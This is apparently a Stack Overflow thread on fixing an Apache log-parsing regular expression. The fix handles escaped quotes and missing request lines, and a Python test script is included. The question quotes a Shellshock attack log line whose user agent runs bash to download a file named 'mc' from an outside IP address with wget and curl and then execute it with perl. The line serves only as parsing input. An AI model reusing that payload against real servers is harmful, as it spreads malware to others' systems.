
I want to parse Apache2 log files and found the otherwise good regexp below:

/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/

The problem is that this regexp predates the Shellshock attack bots, and it returns no match for a log line whose user agent string looks like the one below.

Example of a bash attack line that fails to match:

199.217.117.211 - - [18/Jan/2015:04:51:19 -0500] "GET /cgi-bin/help.cgi HTTP/1.0" 404 498 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://185.28.190.69/mc;curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\""

Here is a regular log line:

157.55.39.0 - - [18/Jan/2015:09:32:37 -0500] "GET / HTTP/1.1" 200 37966 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

Can someone provide an updated regexp that handles a hacked user agent string, or suggest an alternative two-step PHP and regexp approach that is more hack-proof? I can see that the specific problem relates to handling \", and it appears the last part of the regexp can be replaced with "(.*)"$, but I'd like an expert opinion. Thanks.

Charlie
  • Another log line that doesn't work with the original or the revised regexp: `104.192.0.20 - - [20/Jan/2015:15:40:55 -0500] "-" 408 0 "-" "-"` – Charlie Jan 23 '15 at 17:57
  • @Geohut: OP is not having problems with shellshock, or with a vulnerable bash. The problem is parsing Apache logs which contain (presumably unsuccessful) attack attempts. – rici Jan 23 '15 at 19:38

1 Answer


Change both instances of

"([^"]*)"

to

"((?:[^"]|\\")*)"

That will allow \" within quoted strings.
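
As a minimal sketch of that one change in isolation, here is the old and new sub-pattern tried on a shortened attack string. It is written in Python rather than the PHP mentioned in the question, and the names `OLD_FIELD`, `NEW_FIELD` and `sample` are made up for illustration.

```python
import re

# Hypothetical names, for illustration only.
OLD_FIELD = re.compile(r'^"([^"]*)"$')           # no quote allowed inside the field
NEW_FIELD = re.compile(r'^"((?:[^"]|\\")*)"$')   # also accepts \" inside the field

# A shortened stand-in for the quoted user agent field of the attack line.
sample = r'"() { :;}; /bin/bash -c \"id\""'

print(OLD_FIELD.match(sample))            # no match: the embedded \" gets in the way
print(NEW_FIELD.match(sample).group(1))   # field contents, with \" kept as-is
```

Note that `[^"]` also matches a backslash, so the `\\"` branch is only reached by backtracking. The sketch (like the full regexp) is anchored at the end of the line, which is what forces that backtracking to happen.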

By the way, it is not necessary to backslash-escape quotes in a regex, nor is it necessary to backslash-escape ] in a character class when it is the first character in the class. So you could remove some redundant backslashes. And personally, I'd use the same quote exclusion syntax instead of a non-greedy match.

Finally, as observed in a comment, the parse of the request will fail if the request is incomplete. If the only kind of incomplete request line is the missing-request indicator ("-"), then you could recognize it by making most of the request optional, leaving the - as the "method".

So I'd suggest the following:

/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^]]+)\] "(\S+)(?: ((?:[^"]|\\")*) (\S+))?" (\S+) (\S+) "((?:[^"]|\\")*)" "((?:[^"]|\\")*)"$/
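
A quick way to check this pattern against the three log lines quoted in the question and comments is sketched below. It uses Python instead of PHP, drops the `/` delimiters, and the helper name `parse_line` is an assumption made for the example, not part of any library.

```python
import re

# The suggested pattern, copied from above without the / delimiters.
LOG_RE = re.compile(
    r'^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^]]+)\] '
    r'"(\S+)(?: ((?:[^"]|\\")*) (\S+))?" (\S+) (\S+) '
    r'"((?:[^"]|\\")*)" "((?:[^"]|\\")*)"$'
)

def parse_line(line):
    """Hypothetical helper: return the 13 groups as a tuple, or None on no match."""
    m = LOG_RE.match(line)
    return m.groups() if m else None

# The three sample lines from this page: attack, regular, and request timeout.
lines = [
    r'199.217.117.211 - - [18/Jan/2015:04:51:19 -0500] "GET /cgi-bin/help.cgi HTTP/1.0" 404 498 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://185.28.190.69/mc;curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\""',
    r'157.55.39.0 - - [18/Jan/2015:09:32:37 -0500] "GET / HTTP/1.1" 200 37966 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"',
    r'104.192.0.20 - - [20/Jan/2015:15:40:55 -0500] "-" 408 0 "-" "-"',
]

for line in lines:
    fields = parse_line(line)
    # Index 6 is the method (or "-"), 7 the URL, 9 the status, 12 the user agent.
    print(fields[6], fields[7], fields[9], fields[12])
```

For the third line the URL and protocol groups come back empty (`None` in Python), so code that consumes the result has to allow for that.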
rici
  • Thanks - this does seem to work on the bash quoting example but fails on the line where the GET string is missing ( "-" ). I can solve that by taking the (\S+) pieces out of the request, though that sacrifices the simple parsing of request and URL with a single regexp. Maybe I'll fall back to detecting a failed regexp parse and logging the IP and date/time along with the failed log line for now. – Charlie Jan 23 '15 at 18:44
  • @Charlie: Answer updated. For future reference, please don't put additional requirements for your questions in comments to the question. Many people don't read the comments. Instead, edit your question with the additional clarifications. But try to avoid completely changing the question with an edit; it may be better to ask another question. Remember that the point of SO is to create a kind of encyclopedia of good questions with good answers. – rici Jan 23 '15 at 19:35